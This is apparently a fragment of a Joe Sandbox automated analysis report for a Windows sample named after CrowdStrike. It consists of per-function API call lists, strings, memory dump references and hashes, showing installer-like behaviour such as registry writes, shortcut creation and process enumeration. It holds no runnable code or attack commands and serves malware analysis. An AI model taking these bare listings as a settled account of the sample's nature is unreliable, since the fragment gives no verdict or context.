                                                                         • Associated: 00000000.00000002.1711556223.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.1711556223.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.1711653784.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_CrowdStrike.jbxd
                                                                        Similarity
                                                                        • API ID: Directory$SystemVersionWindowslstrcatlstrcpynlstrlen
                                                                        • String ID: @%F$@%F$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                                        • API String ID: 3581403547-784952888
                                                                        • Opcode ID: 5b9b76f287d52b653a8a41dc6b1224aada0ccbd74d66441f1f03372adecf381e
                                                                        • Instruction ID: 7881bd453c5698e0e02013fa1c3524f2cf467b60749c67c5a59258f73e57ab2a
                                                                        • Opcode Fuzzy Hash: 5b9b76f287d52b653a8a41dc6b1224aada0ccbd74d66441f1f03372adecf381e
                                                                        • Instruction Fuzzy Hash: F171F4B1A00215ABDB20AF28CD44A7E3771EF55314F12C03FE906B62E0E77C89A19B5D
                                                                        APIs
                                                                        • CoCreateInstance.OLE32(00409B24,?,00000001,00409B04,?), ref: 0040257E
                                                                        Strings
                                                                        • CreateShortCut: out: "%s", in: "%s %s", icon: %s,%d, sw=%d, hk=%d, xrefs: 00402560
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1711503623.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                         • Associated: 00000000.00000002.1711481938.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.1711525176.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.1711556223.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.1711556223.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.1711556223.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.1711653784.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_CrowdStrike.jbxd
                                                                        Similarity
                                                                        • API ID: CreateInstance
                                                                        • String ID: CreateShortCut: out: "%s", in: "%s %s", icon: %s,%d, sw=%d, hk=%d
                                                                        • API String ID: 542301482-1377821865
                                                                        • Opcode ID: 0ddbb4256677b6c48083548557f3f7fdb52e2b2de327cf14ae3b1cdcca70b28b
                                                                        • Instruction ID: c24c797a6f187c751e7d972b1a807078ee58ffeb38f484aa28d094541f0f6205
                                                                        • Opcode Fuzzy Hash: 0ddbb4256677b6c48083548557f3f7fdb52e2b2de327cf14ae3b1cdcca70b28b
                                                                        • Instruction Fuzzy Hash: 02415E74A00205BFCF04EFA0CC99EAE7B79FF48314B20456AF915EB2E1C679A941CB54
                                                                        APIs
                                                                        • FindFirstFileW.KERNEL32(00000000,?,00000002), ref: 00402E27
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1711503623.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1711481938.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1711525176.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1711556223.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1711556223.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1711556223.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1711653784.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_CrowdStrike.jbxd
                                                                        Similarity
                                                                        • API ID: FileFindFirst
                                                                        • String ID:
                                                                        • API String ID: 1974802433-0
                                                                        • Opcode ID: b5b7ab79f27b5d75a187df3fe9f711fb4388b9579a399927462dc59dec62d440
                                                                        • Instruction ID: b91193b5dd17d351e639dca097a4c2443a83fae7855d8014906372cda19badf2
                                                                        • Opcode Fuzzy Hash: b5b7ab79f27b5d75a187df3fe9f711fb4388b9579a399927462dc59dec62d440
                                                                        • Instruction Fuzzy Hash: 4EE06D32600204AFD700EB749D45ABE736CDF01329F20457BF146F20D1E6B89A41976A
                                                                        APIs
                                                                        • GlobalAlloc.KERNEL32(00000040,00000FA0), ref: 004063BF
                                                                        • lstrlenW.KERNEL32(?), ref: 004063CC
                                                                        • GetVersionExW.KERNEL32(?), ref: 0040642A
                                                                          • Part of subcall function 0040602B: CharUpperW.USER32(?,00406401,?), ref: 00406031
                                                                        • LoadLibraryA.KERNEL32(PSAPI.DLL), ref: 00406469
                                                                        • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 00406488
                                                                        • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 00406492
                                                                        • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 0040649D
                                                                        • FreeLibrary.KERNEL32(00000000), ref: 004064D4
                                                                        • GlobalFree.KERNEL32(?), ref: 004064DD
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1711503623.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1711481938.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1711525176.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1711556223.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1711556223.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1711556223.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1711653784.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_CrowdStrike.jbxd
                                                                        Similarity
                                                                        • API ID: AddressProc$FreeGlobalLibrary$AllocCharLoadUpperVersionlstrlen
                                                                        • String ID: CreateToolhelp32Snapshot$EnumProcessModules$EnumProcesses$GetModuleBaseNameW$Kernel32.DLL$Module32FirstW$Module32NextW$PSAPI.DLL$Process32FirstW$Process32NextW$Unknown
                                                                        • API String ID: 20674999-2124804629
                                                                        • Opcode ID: a5c47c37ebb79c3570a5199304d67498c128a01cd5ae19e8b8640fa4b13707a3
                                                                        • Instruction ID: f5db07f83b48746be4b9c4f5c588c21b75103c60b5638216cabcef37c42edb4d
                                                                        • Opcode Fuzzy Hash: a5c47c37ebb79c3570a5199304d67498c128a01cd5ae19e8b8640fa4b13707a3
                                                                        • Instruction Fuzzy Hash: 38919331900219EBDF109FA4CD88AAFBBB8EF44741F11447BE546F6281DB388A51CF68
                                                                        APIs
                                                                        • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 004054B5
                                                                        • ShowWindow.USER32(?), ref: 004054D2
                                                                        • DestroyWindow.USER32 ref: 004054E6
                                                                        • SetWindowLongW.USER32(?,00000000,00000000), ref: 00405502
                                                                        • GetDlgItem.USER32(?,?), ref: 00405523
                                                                        • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00405537
                                                                        • IsWindowEnabled.USER32(00000000), ref: 0040553E
                                                                        • GetDlgItem.USER32(?,00000001), ref: 004055ED
                                                                        • GetDlgItem.USER32(?,00000002), ref: 004055F7
                                                                        • SetClassLongW.USER32(?,000000F2,?), ref: 00405611
                                                                        • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 00405662
                                                                        • GetDlgItem.USER32(?,00000003), ref: 00405708
                                                                        • ShowWindow.USER32(00000000,?), ref: 0040572A
                                                                        • EnableWindow.USER32(?,?), ref: 0040573C
                                                                        • EnableWindow.USER32(?,?), ref: 00405757
                                                                        • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 0040576D
                                                                        • EnableMenuItem.USER32(00000000), ref: 00405774
                                                                        • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 0040578C
                                                                        • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 0040579F
                                                                        • lstrlenW.KERNEL32(00447240,?,00447240,0046ADC0), ref: 004057C8
                                                                        • SetWindowTextW.USER32(?,00447240), ref: 004057DC
                                                                        • ShowWindow.USER32(?,0000000A), ref: 00405910
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1711503623.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1711481938.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1711525176.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1711556223.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1711556223.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1711556223.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1711653784.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_CrowdStrike.jbxd
                                                                        Similarity
                                                                        • API ID: Window$Item$MessageSend$EnableShow$LongMenu$ClassDestroyEnabledSystemTextlstrlen
                                                                        • String ID: @rD
                                                                        • API String ID: 184305955-3814967855
                                                                        • Opcode ID: 892c705fd8619986465a6960d4e81f7d1e8168c1c52714a2b5abc7a1d7472251
                                                                        • Instruction ID: 0f9b988f21b44e482dc064b3562f20aa73efc2902ac8c6ffeb9ddf27563d0ddb
                                                                        • Opcode Fuzzy Hash: 892c705fd8619986465a6960d4e81f7d1e8168c1c52714a2b5abc7a1d7472251
                                                                        • Instruction Fuzzy Hash: D8C1C371500A04EBDB216F61EE49E2B3BA9EB45345F00093EF551B12F0DB799891EF2E
                                                                        APIs
                                                                        • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 0040416D
                                                                        • GetDlgItem.USER32(?,000003E8), ref: 00404181
                                                                        • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 0040419E
                                                                        • GetSysColor.USER32(?), ref: 004041AF
                                                                        • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 004041BD
                                                                        • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 004041CB
                                                                        • lstrlenW.KERNEL32(?), ref: 004041D6
                                                                        • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 004041E3
                                                                        • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 004041F2
                                                                          • Part of subcall function 00403FCA: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,?,00000000,00404124,?), ref: 00403FE1
                                                                          • Part of subcall function 00403FCA: GlobalAlloc.KERNEL32(00000040,00000001,?,?,?,00000000,00404124,?), ref: 00403FF0
                                                                          • Part of subcall function 00403FCA: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000001,00000000,00000000,?,?,00000000,00404124,?), ref: 00404004
                                                                        • GetDlgItem.USER32(?,0000040A), ref: 0040424A
                                                                        • SendMessageW.USER32(00000000), ref: 00404251
                                                                        • GetDlgItem.USER32(?,000003E8), ref: 0040427E
                                                                        • SendMessageW.USER32(00000000,0000044B,00000000,?), ref: 004042C1
                                                                        • LoadCursorW.USER32(00000000,00007F02), ref: 004042CF
                                                                        • SetCursor.USER32(00000000), ref: 004042D2
                                                                        • ShellExecuteW.SHELL32(0000070B,open,00462540,00000000,00000000,00000001), ref: 004042E7
                                                                        • LoadCursorW.USER32(00000000,00007F00), ref: 004042F3
                                                                        • SetCursor.USER32(00000000), ref: 004042F6
                                                                        • SendMessageW.USER32(00000111,00000001,00000000), ref: 00404325
                                                                        • SendMessageW.USER32(00000010,00000000,00000000), ref: 00404337
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1711503623.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1711481938.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1711525176.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1711556223.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1711556223.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1711556223.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1711653784.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_CrowdStrike.jbxd
                                                                        Similarity
                                                                        • API ID: MessageSend$Cursor$Item$ByteCharLoadMultiWide$AllocButtonCheckColorExecuteGlobalShelllstrlen
                                                                        • String ID: @%F$N$open
                                                                        • API String ID: 3928313111-3849437375
                                                                        • Opcode ID: a841256503f372cb329faf737530af9fe18869c9bb3e71d47027397a25b41a99
                                                                        • Instruction ID: 2c1438ad93098d7b112eeb2502b55652a68651cb38e922ac8f4fb42b83a973d4
                                                                        • Opcode Fuzzy Hash: a841256503f372cb329faf737530af9fe18869c9bb3e71d47027397a25b41a99
                                                                        • Instruction Fuzzy Hash: 0F71A4B1900609FFDB109F60DD45EAA7B79FB44305F00843AFA05B62D1C778A991CF99
                                                                        APIs
                                                                        • lstrcpyW.KERNEL32(0045B2C8,NUL), ref: 00406AA9
                                                                        • CloseHandle.KERNEL32(00000000,000000F1,00000000,00000001,?,00000000,?,00406C90,000000F1,000000F1,00000001,00406EAE,?,00000000,000000F1,?), ref: 00406AC8
                                                                        • GetShortPathNameW.KERNEL32(000000F1,0045B2C8,00000400), ref: 00406AD1
                                                                          • Part of subcall function 00405DB6: lstrlenA.KERNEL32(00000000,?,00000000,00000000,?,00000000,00406BD3,00000000,[Rename]), ref: 00405DC6
                                                                          • Part of subcall function 00405DB6: lstrlenA.KERNEL32(?,?,00000000,00406BD3,00000000,[Rename]), ref: 00405DF8
                                                                        • GetShortPathNameW.KERNEL32(000000F1,00460920,00000400), ref: 00406AF2
                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,0045B2C8,000000FF,0045BAC8,00000400,00000000,00000000,?,00000000,?,00406C90,000000F1,000000F1,00000001,00406EAE), ref: 00406B1B
                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,00460920,000000FF,0045C118,00000400,00000000,00000000,?,00000000,?,00406C90,000000F1,000000F1,00000001,00406EAE), ref: 00406B33
                                                                        • wsprintfA.USER32 ref: 00406B4D
                                                                        • GetFileSize.KERNEL32(00000000,00000000,00460920,C0000000,00000004,00460920,?,?,00000000,000000F1,?), ref: 00406B85
                                                                        • GlobalAlloc.KERNEL32(00000040,0000000A), ref: 00406B94
                                                                        • ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 00406BB0
                                                                        • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename]), ref: 00406BE0
                                                                        • SetFilePointer.KERNEL32(?,00000000,00000000,00000000,?,0045C518,00000000,-0000000A,0040987C,00000000,[Rename]), ref: 00406C37
                                                                          • Part of subcall function 00405E50: GetFileAttributesW.KERNELBASE(00000003,004035C7,004DF0D8,80000000,00000003,?,?,?,00000000,00403A47,?), ref: 00405E54
                                                                          • Part of subcall function 00405E50: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A47,?), ref: 00405E76
                                                                        • WriteFile.KERNEL32(?,00000000,?,?,00000000), ref: 00406C4B
                                                                        • GlobalFree.KERNEL32(00000000), ref: 00406C52
                                                                        • CloseHandle.KERNEL32(?), ref: 00406C5C
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1711503623.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1711481938.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1711525176.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1711556223.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1711556223.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1711556223.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1711653784.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_CrowdStrike.jbxd
                                                                        Similarity
                                                                        • API ID: File$ByteCharCloseGlobalHandleMultiNamePathShortWidelstrcpylstrlen$AllocAttributesCreateFreePointerReadSizeWritewsprintf
                                                                        • String ID: F$%s=%s$NUL$[Rename]
                                                                        • API String ID: 565278875-1653569448
                                                                        • Opcode ID: a83451b5c4aab99109613fb463f01f18261c5de4d9c28115f8397278e7cafe6e
                                                                        • Instruction ID: f97e154d5ee7f709bd30e138c0dd6e282719408add8f0d739c14b832633f1bd9
                                                                        • Opcode Fuzzy Hash: a83451b5c4aab99109613fb463f01f18261c5de4d9c28115f8397278e7cafe6e
                                                                        • Instruction Fuzzy Hash: AE412632104208BFE6206B619E8CD6B3B6CDF86754B16043EF586F22D1DA3CDC158ABC
                                                                        APIs
                                                                        • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                                        • BeginPaint.USER32(?,?), ref: 00401047
                                                                        • GetClientRect.USER32(?,?), ref: 0040105B
                                                                        • CreateBrushIndirect.GDI32(00000000), ref: 004010D8
                                                                        • FillRect.USER32(00000000,?,00000000), ref: 004010ED
                                                                        • DeleteObject.GDI32(?), ref: 004010F6
                                                                        • CreateFontIndirectW.GDI32(?), ref: 0040110E
                                                                        • SetBkMode.GDI32(00000000,00000001), ref: 0040112F
                                                                        • SetTextColor.GDI32(00000000,000000FF), ref: 00401139
                                                                        • SelectObject.GDI32(00000000,?), ref: 00401149
                                                                        • DrawTextW.USER32(00000000,0046ADC0,000000FF,00000010,00000820), ref: 0040115F
                                                                        • SelectObject.GDI32(00000000,00000000), ref: 00401169
                                                                        • DeleteObject.GDI32(?), ref: 0040116E
                                                                        • EndPaint.USER32(?,?), ref: 00401177
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1711503623.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1711481938.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1711525176.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1711556223.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1711556223.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1711556223.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1711653784.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_CrowdStrike.jbxd
                                                                        Similarity
                                                                        • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                        • String ID: F
                                                                        • API String ID: 941294808-1304234792
                                                                        • Opcode ID: f4369597f17a3e87964d78a18e042c43d151941ad2c2ecd61bd33e0f0092c561
                                                                        • Instruction ID: e7530e13063599d95e155ed3b2c7b7521dfa2668d538c4695d9c695e9582dc0d
                                                                        • Opcode Fuzzy Hash: f4369597f17a3e87964d78a18e042c43d151941ad2c2ecd61bd33e0f0092c561
                                                                        • Instruction Fuzzy Hash: 01516C71400209AFCB058F95DE459AF7FB9FF45311F00802EF992AA1A0CB78DA55DFA4
                                                                        APIs
                                                                        • RegCreateKeyExW.ADVAPI32(?,?,?,?,?,?,?,?,?,00000011,00000002), ref: 004028DA
                                                                        • lstrlenW.KERNEL32(004130D8,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 004028FD
                                                                        • RegSetValueExW.ADVAPI32(?,?,?,?,004130D8,?,?,?,?,?,?,?,?,00000011,00000002), ref: 004029BC
                                                                        • RegCloseKey.ADVAPI32(?), ref: 004029E4
                                                                          • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                                          • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                                        Strings
                                                                        • WriteReg: error creating key "%s\%s", xrefs: 004029F5
                                                                        • WriteRegDWORD: "%s\%s" "%s"="0x%08x", xrefs: 00402959
                                                                        • WriteRegStr: "%s\%s" "%s"="%s", xrefs: 00402918
                                                                        • WriteReg: error writing into "%s\%s" "%s", xrefs: 004029D4
                                                                        • WriteRegBin: "%s\%s" "%s"="%s", xrefs: 004029A1
                                                                        • WriteRegExpandStr: "%s\%s" "%s"="%s", xrefs: 0040292A
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1711503623.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1711481938.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1711525176.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1711556223.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1711556223.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1711556223.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1711653784.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                                                        Similarity
                                                                        • API ID: lstrlen$CloseCreateValuewvsprintf
                                                                        • String ID: WriteReg: error creating key "%s\%s"$WriteReg: error writing into "%s\%s" "%s"$WriteRegBin: "%s\%s" "%s"="%s"$WriteRegDWORD: "%s\%s" "%s"="0x%08x"$WriteRegExpandStr: "%s\%s" "%s"="%s"$WriteRegStr: "%s\%s" "%s"="%s"
                                                                        • API String ID: 1641139501-220328614
                                                                        APIs
                                                                        • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,?,?,000000F0), ref: 00402EA9
                                                                        • GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,?,000000F0), ref: 00402EC5
                                                                        • GlobalFree.KERNEL32(FFFFFD66), ref: 00402EFE
                                                                        • WriteFile.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,000000F0), ref: 00402F10
                                                                        • GlobalFree.KERNEL32(00000000), ref: 00402F17
                                                                        • CloseHandle.KERNEL32(?,?,?,?,?,000000F0), ref: 00402F2F
                                                                        • DeleteFileW.KERNEL32(?), ref: 00402F56
                                                                        Strings
                                                                        • created uninstaller: %d, "%s", xrefs: 00402F3B
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1711503623.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        Similarity
                                                                        • API ID: Global$AllocFileFree$CloseDeleteHandleWrite
                                                                        • String ID: created uninstaller: %d, "%s"
                                                                        • API String ID: 3294113728-3145124454
                                                                        APIs
                                                                        • CloseHandle.KERNEL32(FFFFFFFF,00000000,?,?,004062D4,00000000), ref: 004060FE
                                                                        • GetFileAttributesW.KERNEL32(0046A560,?,00000000,00000000,?,?,004062D4,00000000), ref: 0040613C
                                                                        • WriteFile.KERNEL32(00000000,000000FF,00000002,00000000,00000000,0046A560,40000000,00000004), ref: 00406175
                                                                        • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,0046A560,40000000,00000004), ref: 00406181
                                                                        • lstrcatW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00409678), ref: 0040619B
                                                                        • lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),?,?,004062D4,00000000), ref: 004061A2
                                                                        • WriteFile.KERNEL32(RMDir: RemoveDirectory invalid input(""),00000000,004062D4,00000000,?,?,004062D4,00000000), ref: 004061B7
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1711503623.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        Similarity
                                                                        • API ID: File$Write$AttributesCloseHandlePointerlstrcatlstrlen
                                                                        • String ID: RMDir: RemoveDirectory invalid input("")
                                                                        • API String ID: 3734993849-2769509956
                                                                        APIs
                                                                        • GetWindowLongW.USER32(?,000000EB), ref: 00403DE4
                                                                        • GetSysColor.USER32(00000000), ref: 00403E00
                                                                        • SetTextColor.GDI32(?,00000000), ref: 00403E0C
                                                                        • SetBkMode.GDI32(?,?), ref: 00403E18
                                                                        • GetSysColor.USER32(?), ref: 00403E2B
                                                                        • SetBkColor.GDI32(?,?), ref: 00403E3B
                                                                        • DeleteObject.GDI32(?), ref: 00403E55
                                                                        • CreateBrushIndirect.GDI32(?), ref: 00403E5F
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1711503623.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        Similarity
                                                                        • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                        • String ID:
                                                                        • API String ID: 2320649405-0
                                                                        APIs
                                                                        • GetModuleHandleW.KERNEL32(00000000,00000001,000000F0), ref: 0040241C
                                                                          • Part of subcall function 00404F72: lstrlenW.KERNEL32(0043B228,?,00000000,00000000), ref: 00404FAA
                                                                          • Part of subcall function 00404F72: lstrlenW.KERNEL32(004034BB,0043B228,?,00000000,00000000), ref: 00404FBA
                                                                          • Part of subcall function 00404F72: lstrcatW.KERNEL32(0043B228,004034BB), ref: 00404FCD
                                                                          • Part of subcall function 00404F72: SetWindowTextW.USER32(0043B228,0043B228), ref: 00404FDF
                                                                          • Part of subcall function 00404F72: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405005
                                                                          • Part of subcall function 00404F72: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040501F
                                                                          • Part of subcall function 00404F72: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040502D
                                                                          • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                                          • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                                        • LoadLibraryExW.KERNEL32(00000000,?,00000008,00000001,000000F0), ref: 0040242D
                                                                        • FreeLibrary.KERNEL32(?,?), ref: 004024C3
                                                                        Strings
                                                                        • Error registering DLL: %s not found in %s, xrefs: 0040249A
                                                                        • Error registering DLL: Could not load %s, xrefs: 004024DB
                                                                        • Error registering DLL: Could not initialize OLE, xrefs: 004024F1
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1711503623.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        Similarity
                                                                        • API ID: MessageSendlstrlen$Library$FreeHandleLoadModuleTextWindowlstrcatwvsprintf
                                                                        • String ID: Error registering DLL: %s not found in %s$Error registering DLL: Could not initialize OLE$Error registering DLL: Could not load %s
                                                                        • API String ID: 1033533793-945480824
                                                                        APIs
                                                                        • lstrlenW.KERNEL32(0043B228,?,00000000,00000000), ref: 00404FAA
                                                                        • lstrlenW.KERNEL32(004034BB,0043B228,?,00000000,00000000), ref: 00404FBA
                                                                        • lstrcatW.KERNEL32(0043B228,004034BB), ref: 00404FCD
                                                                        • SetWindowTextW.USER32(0043B228,0043B228), ref: 00404FDF
                                                                        • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405005
                                                                        • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040501F
                                                                        • SendMessageW.USER32(?,00001013,?,00000000), ref: 0040502D
                                                                          • Part of subcall function 00406805: GetVersion.KERNEL32(0043B228,?,00000000,00404FA9,0043B228,00000000,?,00000000,00000000), ref: 004068D6
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1711503623.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        Similarity
                                                                        • API ID: MessageSend$lstrlen$TextVersionWindowlstrcat
                                                                        • String ID:
                                                                        • API String ID: 2740478559-0
                                                                        APIs
                                                                          • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                                          • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                                          • Part of subcall function 00404F72: lstrlenW.KERNEL32(0043B228,?,00000000,00000000), ref: 00404FAA
                                                                          • Part of subcall function 00404F72: lstrlenW.KERNEL32(004034BB,0043B228,?,00000000,00000000), ref: 00404FBA
                                                                          • Part of subcall function 00404F72: lstrcatW.KERNEL32(0043B228,004034BB), ref: 00404FCD
